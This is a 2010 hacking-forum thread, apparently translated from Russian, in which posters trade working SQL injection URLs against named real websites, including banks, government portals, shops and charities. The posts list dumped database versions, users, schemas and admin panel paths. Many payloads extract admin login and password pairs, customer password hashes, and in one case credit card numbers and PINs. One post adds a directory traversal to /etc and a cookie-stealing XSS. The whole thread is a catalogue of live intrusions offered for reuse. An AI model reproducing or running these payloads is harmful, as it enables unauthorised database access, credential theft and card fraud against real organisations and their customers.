http://www.vlh.de/cms/news/print_news.php?stID=-298+union+select+1,2,concat%28@i:=0x00,@o:=0x0d0a, benchmark%2844,@o:=CONCAT%28@o,0x0d0a,%28SELECT+co ncat%28table_schema,0x2E,@i:=table_name%29+from+in formation_schema.tables+WHERE+table_name%3E@i+orde r+by+table_name+LIMIT%201%29%29%29,@o%29,4,5,6,7,8 ,9,0,1,2,3,4--
PR 5
http://www.zima-samara.ru/print_news.php?id_n=-5+union+select+1,version%28%29,3,4,5%20--
http://www.bonvk.ru/print_news.php?id=-1822+union+select+1,2,3,4,5,6,7,8,9,0,1+--+
PR 1 TIC 10
http://www.port-all.ru/news/print_news.asp?n=3901+union+select+1,2,3,4,5,6,7,8 ,9+--+
PR 3 TIC 60
http://www.allianz.ua/modules/print_news/mod_print_news.php?mod=news&news=-35+union+select+1,2,3,4 --&lang=ru
PR 4 TIC 250
http://www.kavenit.ru/print_news.php?news_id=-1+union+select+1,2,3,4,5--
PR 3 TIC 10
http://www.moscowatch.ru/swissmade_brand.php?BrandId=-2+union+select+1,2,3--
PR 5 TIC 70
http://www.replicashop.ru/catalog.php?BrandId=-39+union+select+1,2,3 --
TIC 10
%R00tKit%
26.08.2010, 18:56
Well, me too then
Code:
http://www.romanchuk.com.ua/index.php?id=1001+and+1=2+union+select+1,2,3,unhex (hex(group_concat(login,0x3a,password))),5+from+ad min--+
Code:
http://polvent.com/index.php?action=catalog&brand=2&id=58+and+1=2+union+select+1,2,3,group_concat(logi n,0x3a,password,0x0b),5,6,7,8,9,10,11,12,13+from+a dmin--+
Code:
http://mobilstyle.com.ua/view_news.php?id=1+and+1=2+union+select+concat_ws( 0x0b,password),2,3,4,5+from+admin--+
Code:
http://nunhems.com.ua/kultury.php?id=47+and+1=2+union+select+1,2,3,4,5,6 ,7,8,group_concat(user,0x3a,password),10,11,12,13, 14,15,16,17,18,19,20,21,22,23+from+users--+
Code:
http://inkata.lp.edu.ua/index.php?action=news&id=11+and+1=2+union+select+1,2,3,4,5,group_concat( login,0x3a,password),7,8+from+admin--+
shell_c0de
26.08.2010, 20:56
well, let's continue the banking theme )
USA Merrimack County Savings Bank
Code:
http://www.mcsbnh.com/about/news.php?id=-61+UNION+SELECT+1,version(),3,4,5--
Database Version: 4.1.22-standard
Database name: mcsbnhc_mcsb
User name: mcsbnhc_ensky@localhost
http://www.mcsbnh.com/admin/
http://marketnara.com/home/view_goods.html?pid=-18+union+select+1,group_concat(name,char(58),pass) ,3,4,5,6,7,8,9,10,11,121,3,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28+from+admin
[Feldmarschall]
27.08.2010, 00:05
The Central Bank of Mauritius
Oracle
Code:
http://bom.intnet.mu/?id=-40416+union+select+null+from+sys.dual--
Eastern Caribbean Central Bank
mssql
Code:
http://www.eccb-centralbank.org/About/vac_details.asp?vacID=63+or+1=(select top 1 table_name from information_schema.tables)--
Version:
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
*uNkN0Wn*
27.08.2010, 02:15
PR - 5
http://www.valstybe.com/index.php?id=-8051+union+select+1,2,3,4,5,6,version(),8--
user: root@localhost
version: 4.0.25
database: eurovals_valstybe
PR - 7
http://www.fedspending.org/fpds/fpds.php?parent_id=-309123+union+select+group_concat(version(),char(58 ),user(),char(58),database())+--+
version: 4.1.22
user: root@localhost
database: fpds2009z
the site of some federal service, apparently :\
*uNkN0Wn*
27.08.2010, 13:04
http://www.indiaebazar.com/krishnendu/prodesc.php?pid=-40+union+select+1,group_concat(username,char(58),p assword),3,4,5,6+from+eb_user_login+--+
user() indiaeba_ebauser@localhost
version() 5.0.91-community
database() indiaeba_ebazar
http://www.31girl.com/shop.php?pid=-1+union+select+1,2,3,4,group_concat(CreditCardType ,char(58),CreditCardNumber,char(58),CreditCardName ,char(58),CreditCardPinNumber,0x3c62723e),6,7,8+fr om+shop_orders--
user() i31girl_public@localhost
version() 5.0.91-community
database() i31girl_shop
Credit Cards
*uNkN0Wn*
27.08.2010, 15:12
http://www.cashpawnshop.com/item.php?pid=-212+union+select+1,2,3,group_concat(aid,char(58),p wd,0x3c62723e),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19+from+nuke_authors+--+
http://www.wofgdesigns.com/shop.php?pid=-22+union+select+1,2,3,4,5,6,group_concat(version() ,0x3c62723e,user(),0x3c62723e,database()),8,9,10,1 1,12+--+
http://www.easypha-max.com/productdetails.php?id=&pid=-440+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+--+
user() platform2u@192.168.0.171
version() 5.0.85-enterprise
database() ec2u
so, is the banking theme still alive? By the way, I noticed that bank sites in the .ru zone are much better protected than their foreign counterparts, although with enough determination you can still find a bug
Bank "Obyedinyonny Kapital"
Code:
http://www.okbank.ru/?p=-61+union+select+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7,8,9,10, 11,12,13,14,15+--+
-PRIVAT-
28.08.2010, 11:14
http://www.denmanconsulting.com/print_articles.asp?id=149+and+1=@@version%20+--+
PR 1
http://www.sedap-sekejap.com/print_articles.asp?id=1+or+1=%28SELECT+TOP+1+TABLE _NAME+FROM+INFORMATION_SCHEMA.TABLES%29--
PR 4
http://www.france-israel.org/modules/print_articles.php?art_id=-1+union+select+version%28%29%20--
PR 4
http://www.cyberschool.oxfam.org.hk/print_articles.php?id=-90+union+select+1,2,3,4,concat%28@i:=0x00,@o:=0x0d 0a,benchmark%2858,@o:=CONCAT%28@o,0x0d0a,%28SELECT +concat%28table_schema,0x2E,@i:=table_name%29+from +information_schema.tables+WHERE+table_name%3E@i+o rder+by+table_name+LIMIT%201%29%29%29,@o%29,6,7,8, 9,0,1,2,3--
TIC 10 PR 6
http://www.ipa.spb.su/html/print_news.php?id=17&nid=-797+union+select+1,2,3,4,5,6,version%28%29,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2--
TIC 10 PR 6
http://www.clarkapartments.com/print_news.asp?id=248+and+1=@@version%20--
TIC 10 PR 5
http://www.emk.ru/print_news.php?id=44+union+select+1,2,3,4,5,6+--+
TIC 220 PR 3
http://www.ekatbo.ru/print_news.php?id=1360+union+select+1,2,3,4,5,6,7, 8,9,0,1--
PR 1
http://www.bosam.ru/print_news.php?id=339+union+select+1,2,3,4,5,6,7,8 ,9,0,1%20--
PR 2
http://www.parlamentiregionali.it/inc/php/print_news.php?id=-59221+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8%20+--+
PR 5
http://www.queento.ru/site.php?id=-57+union+select+1,concat_ws(0x3a,login,0x3a,pass_h ash),3,4,5,6,7,8+from+accounts+limit+0,1--
http://www.safarimaldives.com/live.php?id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5+--+
http://www.pacificotowncenter.com/world.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,LOGIN,0x 3a,PASSWORD),8,9,10+from+tbl_admin+--+
*uNkN0Wn*
28.08.2010, 15:54
http://www.ozarkhomesandproperty.com/mls/index.php?client_id=-2+union+select+1,2,group_concat(email),4,5+from+le ads+--+
PR - 6
http://www.virtualstudios.gr/portfolio.cfm?client_id=-85+union+select+1,2,3,4,5,6,group_concat(username, 0x3a,password),8,9,10,11,12,13,14+from+users+--+
http://www.gearjunkies-userstudios.com/studio.php?stid=-221+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13+--+
Getin Holding S.A.
didn't get as far as the bank
Code:
http://www.getin.pl/en/index.php?&level=pnews&&id=-146+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat_ws(0x3a,version(),database(),user()),15,16,17, 18,19,20,21--
Code:
5.1.48-1-log:getin2:getin2@10.0.0.36
http://www.arcdream.com/godlike/power.php?id=-1+union+select+1,group_concat(0x3a,version(),0x3a, database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13, 14,15,16+--+
Yandex TIC 10
Google PageRank 4
*uNkN0Wn*
28.08.2010, 19:22
http://www.machineshopmarketing.com/news.php?id=-138+union+select+1,group_concat(user(),version()), 3,4,5,6,7+--+
output is in the title
A strange SQLi. If anyone gets any output, explain it in a PM.
http://www.smplus.ru/green.php?id_cat=3&id=-15+union+select+1,table_name,3,4,5,6+from+informat ion_schema.tables+--+
http://www.dms7.ru/index.php?name=portfolio&part=-4+union+select+group_concat(0x3a,version(),0x3a,us er())+--+
http://www.menani.it/menani/listino.php?id_cat=-20+union%20select+1,2,3,version%28%29,database%28% 29,6,7,8,9,user%28%29,11,12,13,14--
5.0.45-log menaniitdb0001 menaniit0001@w431.widhost.net
http://allmetal.metalgirls.com/wallpaper/wp_list_e.php?id_cat=10%27+union+select+1,concat%2 8Version%28%29,0x3a,Database%28%29,0x3a,User%28%29 %29+LIMIT+1,1--+
5.1.41-3UBUNTU12.6:C1_ALLMETAL:C1_ALLMETAL@LOCALHOST
http://www.medautomotive.it/en/product.php?id_cat=1&id_prod=13+UNION+SELECT+AES_DECRYPT%28AES_ENCRYPT% 28CONCAT%28Version%28%29,0x3a,Database%28%29,0x3a, User%28%29%29,0x71%29,0x71%29,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35+LIMIT+1,1--+
Database Version: 4.1.16-standard-log
Database name: 030594med
User name: med@66.71.190.104
http://www.wanyone.com/gallery/categoria.php?id_cat=5+union+select+1,concat(Versi on(),0x3a,Database(),0x3a,User())--+
4.1.25-Debian_mt1:db33932_wanyone:db33932_wany@64.13.192. 22
http://ruspioner.ru/ru.php?id_cat=19+union+select+concat%28Version%28% 29,0x3a,Database%28%29,0x3a,User%28%29%29+LIMIT+1, 1
5.4.2-beta-log:ruspioner_new:ruspioner@localhost
http://www.artlounge.net/events_activities.php?id_cat=7+union+select+1,conc at%28Version%28%29,0x3a,Database%28%29,0x3a,User%2 8%29%29,3+LIMIT+1,1
4.1.22-standard-log:356371_artlounge:356371_artlounge@172.16.11.30
http://www.fotosviat.bg/php/contest_month.php?id=-36+or+(select+count(*)from(select+1+union+select+2 +union+select+3)x+group+by+concat(mid((select+vers ion()),1,64),floor(rand(0)*2)))--
http://www.bergerssports.com/events/events_month.php?id=2+group+by+7+--+
http://www.gold-mile.ru/houses/index.php?type=specials&id=86+union+select+1,2+--+
TIC : 10 PR: 4
http://www.lavina.ru/window.php?id=128+'+UnIon+selECt+1,2,version(),4,5 ,6,7,8,9,10+--+
TIC : 50 PR: 3
http://www.promoonly.com/search/printfriendly_month.php?id_fp=1&month=1&year=-2008
TIC : 10
stepashka_
29.08.2010, 15:40
Code:
http://www.briarshallhotel.co.uk/window.php?id=-71+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5--+
5.1.48-community-log:web86-briars:web86-briars@localhost
PageRank 3
Code:
http://pushino-oka.ru/desk/ind.php?pn=6&id_categ=-42+union+select+1,2,3,4,5,6,TABLE_NAME,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23+FROM%20INFORMAT ION_SCHEMA.TABLES--+
5.0.84-percona-highperf-b18-log:Markus7_desk:Markus7_desk@194.176.118.6
TIC 20
http://www.kraina-z.com.ua/discount.php?id=1'+UnIon+selECt+1,2,3,group_concat (table_name+separator+'%3Cbr%3E'),5+from+informati on_schema.tables--+
TIC : 10
http://www.moto-r.org/view_massage.php?id=-39+UnIon+selECt+1,2,concat_ws(0x3a,id,user,pass),4 ,5,6,7,8,9,10,11+from+userlist+--+
daniel_1024
29.08.2010, 23:52
GOV hack
Code:
http://www.zzhk.gov.cn/zwgk/xxgk_show.php?id=13809+and+1=0+union+select+1,vers ion(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
PR: 4 Tcy: 0
Database Version: 5.0.45-community-nt
Database name: zzhk
User name: zzhk@localhost
OC type: Win32
http://www.zzhk.gov.cn/phpmyadmin/ - 200 OK
Code:
http://www.crbio03.gov.br/sobre/index.php?id=1709+and+1=0+union+select+1,2,version (),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23--
PR: 5 Tcy: 0
Database Version: 5.0.90-community
Database name: crbio3_crbio3c
User name: crbio3_crbio3@localhost
OC type: pc-linux-gnu
Code:
http://www.iz.sp.gov.br/pesq_bia.php?id=17209+and+1=0+union+select+1,2,3,4 ,5,version(),7,8,9,10,11,12,13,14,15,16--
PR: 5 Tcy: 0
Database Version: 5.0.77
Database name: db_zootecnia
User name: site@localhost
OC type: portbld-freebsd6.2
File_priv:Y
http://www.iz.sp.gov.br/phpinfo.php - 200 OK
stepashka_
30.08.2010, 00:37
Code:
http://ukrboard.info/ind.php?pn=1&id_typ=-49+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28--+
5.0.22:vetaxa_ukrboard:vetaxa_do8@localhost
TIC 20
PageRank 2
Admin panel http://ukrboard.info/Admin/
Code:
http://www.cbo.kz/board/ind.php?pn=1&id_categ=-29+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,33--+
5.0.91-LOG:V-271_BOARD:V-271_BOARDMAN@VKZ1.HOSTER.KZ
TIC 40
PageRank 3
Code:
http://www.kay.by/rasprodaza/ind.php?pn=2&id_typ=-44+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23--+
4.1.22-standard:kayby_1:kayby_1@localhost
TIC 30
PageRank 5
Code:
http://www.mckn.ru/gocka/ind.php?pn=0&id_categ=-3+union+select+1,2,3,4,5,UNHEX(HEX(concat_ws(0x3a, version(),database(),user()))),7,8,9,10,11,12,13,1 4,15--+
4.1.11-Debian_4sarge5-log:z59769_mckn:z59769_mckn@77.221.130.17
TIC 230
PageRank 2
Admin panel http://www.mckn.ru/admin/
Code:
http://www.autodvor.com/ind.php?pn=3&id_categ=-209+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23--+
5.1.47-community-log:bestmobi_doska:bestmobi_admin@localhost
TIC 10
PageRank 2
Admin panel http://www.autodvor.com/Admin/
Code:
http://www.master-class-realty.ru/doska/ind.php?pn=1&id_typ=-162+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),database(),user()),7,8,9,10,11,12,13--+
5.0.45-LOG:MASTERDOSKI6:ROOT@LOCALHOST
TIC 80
http://www.eastpsych.com.au/pro.php?id=-77+UnIon+selECt+1,2,3,4,5,6,7,8+--+
http://www.snowboardprofiles.com/pro.php?id=-3+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,version(),21,22,23,24,25,26,27,28,29, 30,31,32,33,34+--+
PR: 2
Strilo4ka
30.08.2010, 13:30
Code:
http://stitch.kh.ua/index.php?section=products&action=list&category=49%20and%20%28select%20count%28*%29%20fro m%20%28select%201%20union%20select%202%20union%20s elect%203%29x%20group%20by%20concat%28%28%20Select %20COLUMN_NAME%20FROM%20information_schema.COLUMNS %20WHERE%20TABLE_NAME=0x75736572%20and%20TABLE_SCH EMA=0x7374697463685f73686f70%20%20limit%200,1%29,f loor%28rand%280%29*2%29%29%29%23
admin panel /admin
CMS MIB 2008
branch 5.0.51a-24+lenny2-log, DB stitch_shop, user stitch@localhost, server debian-linux-gnu
columns user
idс login password userid usergroupid membergroupids displaygroupid username password passworddate email1 styleid parentemail1 homepage icq aim yahoo1...
DB
information_schema belson rpo_itstep_forum stitch?shop stitch_forum stitch_oscommerce stitch_shop
Code:
http://hsr.kh.ua/services/main/index.php?go=index-2&type=2%20and%200%20union%20select%20111111111111%2 3&add=index22
Code:
http://www.news2news.com/vfp/?group=13+and+5=@@version--+&=0&PHPSESSID=a8c7ba850a36c4fceef6149ec16a7424 -> true
http://www.news2news.com/vfp/?group=13+and+4=@@version--+&=0&PHPSESSID=a8c7ba850a36c4fceef6149ec16a7424 -> false
www.news2news.com: it has errors everywhere as it is, even without injections.
Code:
http://www.imaginenative.org/gallery_preview.php?id=24&y=99%27%20+%20and%201=%28select%20count%28*%29%20f rom%20%28select%201%20union%20select%202%20union%2 0select%203%29x%20group%20by%20concat%28version%28 %29,floor%28rand%280%29*2%29%29%29--+
Duplicate entry '5.0.851' for key 1
portbld-freebsd7.21
columns table login:
login_fname login_lname username password
columns table clients:
id client_role client_contact_first_name client_contact_last_name client_aboriginal
client_indigenous_affiliation lient_company_name client_street client_city client_province
client_postalcode client_country client_phone_type client_phone_country_code client_phone
client_phone_ext client_phone_type client_fax client_email client_web client_artist_bio client_artist_other_works
client_ts client_call_id client_address_type lient_address_unit client_street_Part2 client_main_contact
client_phone1_area_code client_phone1_part_one client_phone1_part_two client_phone2_area_code client_phone2_part_one client_phone2_part_two client_fax_area_code client_fax_part_one
Code:
http://www.abbeyfield.ca/story.php?aid=54+union+select+1,2,3,4,5,6,7--+
db481269@localhost
information_schema:db481269
house_info
id:society_name:house_name:location:city:founded:c apacity:contact:contact_phone:contact_email:cost:w ebsite:in
Code:
http://www.sierra.ca/news.php?id=25%20and%200%20union%20select%201,GROU P_CONCAT%28SCHEMA_NAME%20SEPARATOR%20%27:%27%29,3, 4,5,6,7%20FROM%20information_schema.SCHEMATA--+
Strilo4ka
30.08.2010, 14:16
Code:
http://mercury.odessa.ua/details/32664%20union%20select%201,2,3,concat_ws%280x3a,ve rsion%28%29,database%28%29,user%28%29,@@version_co mpile_os%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28%23/
5.0.45:AllOde:WebSite@localhost:redhat-linux-gnu
DB
information_schema:AllOde:Evgen:dbwap:jom_:luzanov ka_db:mysqlds17
PosOut:anketa:banners:extr:groups:job_rel:klvidjob :kodsng:kodukr:kodword:link_anketa:marshrut:messag e:navigator:newseoplehoneosin:rubricator:street:st ruode:tamoj:txtvals:user_info:vlastukr
user_info
id_user:name_userass_user:copy_password:mail_user: icq_userhone_user:url_user:city_user:firm_user:inf o_user
Code:
http://mercury.odessa.ua/details/32664 union select 1,2,3,concat_ws(0x3a,name_user,pass_user),5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28 FROM user_info limit 0,1/
Code:
http://mercury.odessa.ua/details/32664%20union%20select%201,2,3,aes_decrypt%28aes_e ncrypt%28pass_user,1%29,1%29,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20FR OM%20user_info%20limit%201,1/
http://turniere.govb.de/bbc/ - PR 0 here, but here http://turniere.govb.de it is already PR 4 and TIC 10
From the error we learn the table prefix from the schema: it is bbc_
Extracting the first admin's data:
Code:
http://turniere.govb.de/bbc/e107_plugins/registration/playerlist.php?order=1,%28select%20count%28*%29%20 from%20%28select%201%20union%20select%202%20union% 20select%203%29x%20group%20by%20concat%28%28select %20user_loginname%20from%20bbc_user%20limit%200,1% 29,0x3a,%28select%20user_password%20from%20bbc_use r%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%2 9%29
The password is complex.
Extracting the second admin:
Code:
http://turniere.govb.de/bbc/e107_plugins/registration/playerlist.php?order=1,%28select%20count%28*%29%20 from%20%28select%201%20union%20select%202%20union% 20select%203%29x%20group%20by%20concat%28%28select %20user_loginname%20from%20bbc_user%20where%20user _admin=1%20limit%201,1%29,0x3a,%28select%20user_pa ssword%20from%20bbc_user%20limit%201,1%29,0x3a,flo or%28rand%280%29*2%29%29%29
The password is easily brute-forceable.
But there are no rights in the admin panel; no shell was uploaded.
pr3
Code:
http://psphungary.hu/e107_plugins/nboard/nboard.php?cat=1%29%20and%201=%28select%201%20from %20%28select%20count%28*%29%20from%20%28select%201 %20union%20select%202%20union%20select%203%29x%20g roup%20by%20concat%28%28select%20%20concat_ws%280x 3a,user_loginname,user_password%29%20from%20e107_u ser%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29 %29%29y%29--+
The admin panel is a different one; no shell was uploaded.
pr2
Code:
http://www.kirovfishing.ru/e107_plugins/nboard/nboard.php?cat=1) and 1=(select 1 from (select count(*) from (select 1 union select 2 union select 3)x group by concat((select concat_ws(0x3a,user_loginname,user_password) from e107_user limit 0,1),0x3a,floor(rand(0)*2)))y)--+
No rights; no shell was uploaded.
pr1
Code:
http://bagazniki.com.ua/index.php?id=688+and+%28select%20count%28*%29%20fr om%20%28select%201%20union%20select%202%20union%20 select%203%29x%20group%20by%20concat%28version%28% 29,floor%28rand%280%29*2%29%29%29
pr4
Code:
http://www.pogoda.ua/index.php?id=4+and+0+union+select+1,concat_ws%280x 3a,login,password%29,3,4,5+from+users+limit+0,1--+
pr3 => the gays made me convert it to the required encoding
Code:
http://www.menoboy.com/repertoire-videos-gays/extrait-video-gay.php?id=269+union+select+1,2,3,4,5,6,7,unhex%28 hex%28concat_ws%280x3a,version%28%29,user%28%29,da tabase%28%29,@@version_compile_os%29%29%29,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+
4.1.11:db1@localhost:db1:mandrake-linux-gnu
sorry, some of these may be reposts; no time to check.
stepashka_
30.08.2010, 16:04
Code:
http://mexco.ru/ind.php?pn=0&id_categ=-47+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23--+
5.0.77-log:gecto756_mexco:gecto756_mexco@localhost
TIC 20
PageRank 2
Admin panel http://mexco.ru/Admin/
P.S. look for the fields yourselves))
Code:
http://kaktak.net/dosk/ind.php?pn=1&id_categ=-15+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23--+
5.0.67-community:sdelka5_kaktak:sdelka5_sdelka5@localhost
TIC 150
PageRank 1
http://www.travelwheel.ru/runs/foto4.php?id=-1469+union+select+1,2,3,4,5,6,version(),8+--+
TIC: 10 PR: 2
http://www.jks2000.ru/index.php?id=33+'+union+select+1,2,3,version(),5,6 +--+
TIC: 20 PR: 2
http://akmeo.rus.net/index.php?id=119+union+select+1+--+
TIC: 50
http://www.piter-print.ru/index.php?id=3'
TIC: 20
http://www.mwis.org.uk/webcams.php?cam=-15+union+select+1,2,version(),4,5,6--
http://www.aact.org.gh/newsite/pages/press/index.php?id=-10'+union+select+1,2,3,4,unhex(hex(versi
on())),6+order+by+'4
http://www.online.scouting.org.za/calendar/eventdisplay.php?id=-766+union+select+1,2,version()--
stepashka_
30.08.2010, 19:46
Code:
http://www.scotish.ru/board/ind.php?pn=2&id_categ=-42+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23--+
4.1.22-standard-log:scotish_board:scotish_admin@localhost
TIC 10
PageRank 2
Code:
http://www.fazendeiro.ru/board/ind.php?pn=1&id_categ=-31+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,database(),user()),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21+--+
5.1.45:db1708c:us1708c@10.0.1.39
Code:
http://www.fazendeiro.ru/board/ind.php?pn=1&id_categ=-31+union+select+1,2,3,4,5,group_concat(column_name ),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+FROM+I NFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x70687 062625f7573657273+--+
Code:
http://www.fazendeiro.ru/board/ind.php?pn=1&id_categ=-31+union+select+1,2,3,4,5,username,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21+FROM+phpbb_users+--+
TIC 50
http://www.lankapetlovers.com/petInfo_details.php?infoId=-2510+union+select+1,2,concat(username,char(58),pas sword),4+from+users
e[X]theta[M]ine
31.08.2010, 01:23
http://bazar-auto.ru/board/ind.php?pn=1&id_categ=1+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
PR:5
TIC:160
http://www.hajosalfred.hu/eng/flow.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os)--
http://www.helpersofmary.org/community.php?id=-17+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4,5,6,7,8,9,10, 11--
http://www.collinsbuilders.net/community.php?id=-20+union+select+1,2,3,4--
http://www.wentworthseniorliving.com/wentworth/community.php?id=-2+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23--
http://www.goxgo.ca/community.php?id=-11+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,database(),user(),@@version_compile_os),7,8,9,10, 11--
http://www.helpersofmary.org/community.php?id=-51+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4,5,6,7,8,9,10, 11--
e[X]theta[M]ine said:
http://bazar-auto.ru/board/ind.php?pn=1&id_categ=1+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
PR:5
TIC:160
What you posted can hardly be called an injection; a query for your case should have looked roughly like this
Code:
http://bazar-auto.ru/board/ind.php?pn=1&id_categ=-1+union+select+1,2,3,4,5,concat(login,char(58),pas sword),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +tbl_admin_users+--+
Municipal website of the city of Alushta
http://www.alushta.crimea.ua/rest/type_rest.php?type=-1+and+1=2+union+all+select+concat_ws(0x3a,login,pa ssword,email),2,3,4,5,6,7,8,9,10+from+users--
http://www.romenewsbywatson.com/inside.php?id=-62+UnIon+selECt+1,2,3,4,5,concat_ws(0x3a,username, password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24+from+adminusers+--+
PR: 3
http://www.bhcc.mass.edu/inside/inside.php?navID=132&id=257'+UnIon+selECt+1,version(),3,4,5,6,7,8,9,10, 11,12,13,14,15,16+--+
TIC: 10
http://www.finger-lakes-tours.com/inside.php?id=-167'+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17+--+
http://www.awrad.org/einside.php?id=-4+union+select+1,2,3,4,5+--+
Axel_Ustus
31.08.2010, 12:26
http://www.artspace.org.au/gallery_project.php?i=132+union+select+1,2,3,4,5,v ersion%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24--
my first one)
posted here
http://www.vpole.ru/press/?id=-1741+union+select+1,2,concat_ws%280x3a,user,passwd %29,4,5,6,7+from+users+limit+0,1--+
TIC: 375 PR: 5
http://tatalc.ru/tatalc2/?pg=3&bl=1&md=2&iddoc=-17499'+UnIon+selECt+1,2,3,4,5,concat_ws(0x3a,login ,passwd),7,8,9,10,11,12,13,14,15,16,17,18,19+from+ access_users+limit+0,1--+
TIC: 350
LiRvD082
31.08.2010, 17:24
http://www.proday-biznes.ru/index.php?module=shop&file=checkout&id=-1+OR+(SELECT+COUNT(*)+FROM+(select+count(0),concat ((select+CONCAT(0x75737372,concat(0x7665723a,versi on()),0x75737372)+from+information_schema.tables+l imit+0,1),floor(rand(0)*2))+from+information_schem a.tables+group+by+2+limit+0,1)a)--+
....
daniel_1024
31.08.2010, 18:29
1.5k hashes in a single query))
http://bomond.net.ua/my/compare.php?id=131269+and+1=0+union+select+1,conca t(@i:=0x00,@o:=0x0d0a,benchmark(1500,@o :=CONCAT(@o,0x0d0a,(SELECT concat(@i:=customers_password) from bomondlg_bomondshop.customers WHERE customers_password >@i order by customers_password LIMIT 1))),@o)
remove the spaces where needed...
P.S. shortened the link - http://is.gd/eNo1p
Preferably open it in FF
http://www.clean-up.ru/cat.php?id=-511+union+select+group_concat%28table_name%29,2,3, 4,5,6+from+information_schema.tables--+
TIC: 20
Table admin : username,PASSWORD
http://www.rzeczna.pl/lineage.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74,75+--+
SQL Injection
http://mec1rgqh.panontrade.com/offers.php?id=885+and+1=0+union+select+1,2,3,4,5,6 ,group_concat(es_admin_name,char(58),es_pwd),8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23+from+esb2 b_admin&file=Products&prod=sell&uid=mec1rgqh
file reader
log in to the admin panel (http://panontrade.com/admin)
http://panontrade.com/admin/manage_pages.php?curr_page=passwd&curr_subdir=../../../../../../../../../../etc
XSS
and of course XSS
http://panontrade.com
in the search field enter ">alert()
and one more XSS in the admin panel, http://panontrade.com/admin/edit_link.php
in the Contact Person field enter ">alert(document.cookie)
http://ugc.sollies.free.fr/joo154/m/un.php?id=-472+union+select+TABLE_NAME,2,3,4,5,6+FROM+INFORMA TION_SCHEMA.TABLES--
http://www.unostra.com/union.php?id=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
http://www.thailabordatabase.org/en/union.php?c=detail&id=-1312+union+select+1,2,3,4,5,database(),7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55--
